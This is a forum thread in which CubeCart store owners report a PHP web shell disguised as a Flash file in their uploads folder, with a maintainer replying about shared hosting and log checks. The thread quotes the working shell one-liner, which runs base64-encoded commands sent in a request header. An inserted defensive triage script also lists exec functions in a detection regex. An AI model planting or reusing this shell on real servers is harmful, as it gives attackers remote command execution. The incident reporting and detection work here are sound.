
.moo.php.fla


sleepyfrog


The file .moo.php.fla appeared in my images/uploads folder

The file contains

<?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>

Which seems to just print out the writable status of the folder

I have deleted the file but want to warn other people in case it is a hacker targeting CubeCart installs.


Also had this file appear, and a variation .moo.php(1).fla, both in the images/uploads folder; they seem to have appeared on the 22nd June. They don't open in Flash, and the size of the file when properties are checked is different (1kb and 4kb), suggesting possible hidden coding.

I've deleted them from my server. They don't trigger spyware or virus warnings when scanned. No idea what they are. Both were set to 777, which is odd as my image folders are set to 755.

Any info much appreciated as currently unable to track the source.

Update: this made interesting reading. Is this what's happening? If so, is there a security hole in 4.3.3, and how quickly can it be fixed?

Encapsulating CSRF attacks http://blog.guya.net/category/flash-security/

and Google searches for <?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> reference several possible code exploit options.

I think this needs checking out ASAP.

15.12pm further update: I've spoken to my server host and they say it appears the files were uploaded through cubecart. I'm posting a bug report on this.


> 15.12pm further update: I've spoken to my server host and they say it appears the files were uploaded through cubecart. I'm posting a bug report on this.

There are no known security holes. Can you ask them for evidence for this claim? This will then show us if/how we can patch it.

FYI, most budget hosting providers can have hundreds or thousands of accounts per server. It only takes one bad piece of code for every account holder on the server to have their service affected. If one bad piece of code somewhere on the server allows a bad PHP script to be uploaded, it can spawn throughout the server and copy itself to every world-writeable folder, such as the images/uploads folder of any account holder on the server.

I would say that this issue is not likely to be a CubeCart security hole but a downside of shared hosting. There really is nothing we can do to investigate until someone shows us a server access log or some other kind of log of activity around CubeCart and this file.


Hi Al,

We're not set up on a budget server; our site is hosted on a VDS restricted to 12 accounts per server. Still a risk element, I know, but not as bad as a budget space. Unfortunately, as I'm in charge of the space, I didn't realise I hadn't set the log files to archive, so I don't have a raw log file for the date the files appeared. I do have some other data and I will go through those and see if I can find anything unusual.

Support at the hosting company suggested that access may have been gained via CubeCart's upload facility, I assume they mean the picture manager, but again I don't have the evidence to support this.


Yeah, that makes a difference. Can you "grep" the log files to look for this file name or any of the "rte" paths?

I've got my server support looking into this for me, I'll pass your request on and get back as soon as we have more info.

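A triage script for what this thread describes, added here as an example; it is not code from the thread, from CubeCart, or from either poster. The one-liner quoted above is a web shell: `$_SERVER[HTTP_CMD]` is the request header `Cmd:`, so the attacker's command is base64-encoded in a header and passed to `passthru()`. The command therefore never appears in the URL or in a standard access log, which is why Al's suggestion to grep the logs for the file name itself (rather than for anything suspicious-looking in the query string) is the right approach. The script walks an uploads directory for files that contain PHP whatever their extension (the `.fla` suffix disguises a PHP script; note that Apache's mod_mime with `AddHandler ... .php` considers every dot-separated part of a name, so `.moo.php.fla` can still be executed as PHP), flags the 777 mode both posters saw, matches the shell's signature, and greps constructed access-log lines for the flagged names. The directory layout, file contents and log lines are all constructed inline for the demo.

```python
"""Triage for a disguised PHP web shell in an uploads directory (added example).

1. find files containing PHP regardless of extension and note world-writable modes;
2. match the shell's signature: an exec-style call fed by base64_decode($_SERVER[HTTP_*]);
3. grep access-log lines for requests to the flagged file names.
"""
import os
import re
import stat
import tempfile

# Shell body as quoted in the thread.
SHELL_SRC = ('<?php error_reporting(0);${print(_code_)}.'
             '${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>')

PHP_TAG = re.compile(rb'<\?(php|=)', re.I)
# command-execution function whose argument is base64_decode($_SERVER[HTTP_...])
SHELL_SIG = re.compile(
    rb'(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(\s*'
    rb'base64_decode\s*\(\s*\$_SERVER\s*\[\s*\'?"?(HTTP_\w+)', re.I)

# Constructed access-log lines (not from the thread); addresses are RFC 5737 ranges.
LOG = [
    '203.0.113.5 - - [22/Jun/2010:03:14:07 +0100] "GET /images/uploads/.moo.php.fla HTTP/1.1" 200 6 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Jun/2010:03:15:10 +0100] "GET /index.php?_a=product&product_id=12 HTTP/1.1" 200 10342 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Jun/2010:03:16:42 +0100] "POST /images/uploads/-moo.php.fla HTTP/1.1" 200 58 "-" "curl/7.19"',
]


def header_name(server_key):
    """Map a $_SERVER HTTP_* key back to the request header that populates it."""
    assert server_key.upper().startswith('HTTP_')
    return '-'.join(part.capitalize() for part in server_key[5:].split('_'))


def scan_uploads(root):
    """Return a finding dict for every file under root that contains PHP code."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                data = fh.read(65536)
            if not PHP_TAG.search(data):
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            sig = SHELL_SIG.search(data)
            findings.append({
                'path': path,
                'name': name,
                'mode': oct(mode),
                'world_writable': bool(mode & stat.S_IWOTH),
                'exec_func': sig.group(1).decode().lower() if sig else None,
                'header': header_name(sig.group(2).decode()) if sig else None,
            })
    return findings


def grep_access_log(lines, names):
    """Return the log lines that request any of the given file names."""
    pattern = re.compile('|'.join(re.escape(n) for n in names))
    return [line for line in lines if pattern.search(line)]


def strip_world_write(path):
    """Drop the o+w bit (the 777 seen in the thread) and return the new mode."""
    mode = stat.S_IMODE(os.stat(path).st_mode) & ~stat.S_IWOTH
    os.chmod(path, mode)
    return mode


def build_demo():
    """Create a constructed images/uploads tree: two shells plus a benign PNG."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, 'images', 'uploads')
    os.makedirs(uploads)
    for name, body, mode in [
        ('.moo.php.fla', SHELL_SRC.encode(), 0o777),
        ('-moo.php.fla', SHELL_SRC.encode(), 0o777),
        ('logo.png', b'\x89PNG\r\n\x1a\n' + b'\x00' * 32, 0o644),
    ]:
        path = os.path.join(uploads, name)
        with open(path, 'wb') as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root


if __name__ == '__main__':
    demo_root = build_demo()
    found = scan_uploads(demo_root)
    for f in found:
        print(f"{f['path']} mode={f['mode']} world_writable={f['world_writable']} "
              f"exec={f['exec_func']} command_header={f['header']}")
    for hit in grep_access_log(LOG, [f['name'] for f in found]):
        print('LOG HIT:', hit)
```

Run it against a real `images/uploads` by passing that path to `scan_uploads()` and your rotated access logs to `grep_access_log()`; the `Cmd:` header that carried the commands will not be in those logs unless the server was configured to log request headers, so the file-name hits are the lead to follow, not the full story.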

Sorry Al, I've drawn a blank as I forgot to set the logs up properly. The following is the response from my support:

I have investigated and do not believe the account was accessed by FTP or the server control panel, but can't confirm how the file was uploaded as I don't have the raw HTTP logs. The system also runs Suhosin and uses the latest version of PHP, and there haven't been any root SSH logins.

Guest amnesiac

I just found 2 files in our images/uploads folder.

Files:

-moo.php.fla

.moo.php.fla

Code in files (it's actually a PHP file):

<?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>

I contacted our host and will see what they say. I also noticed it on another site I did a while back.
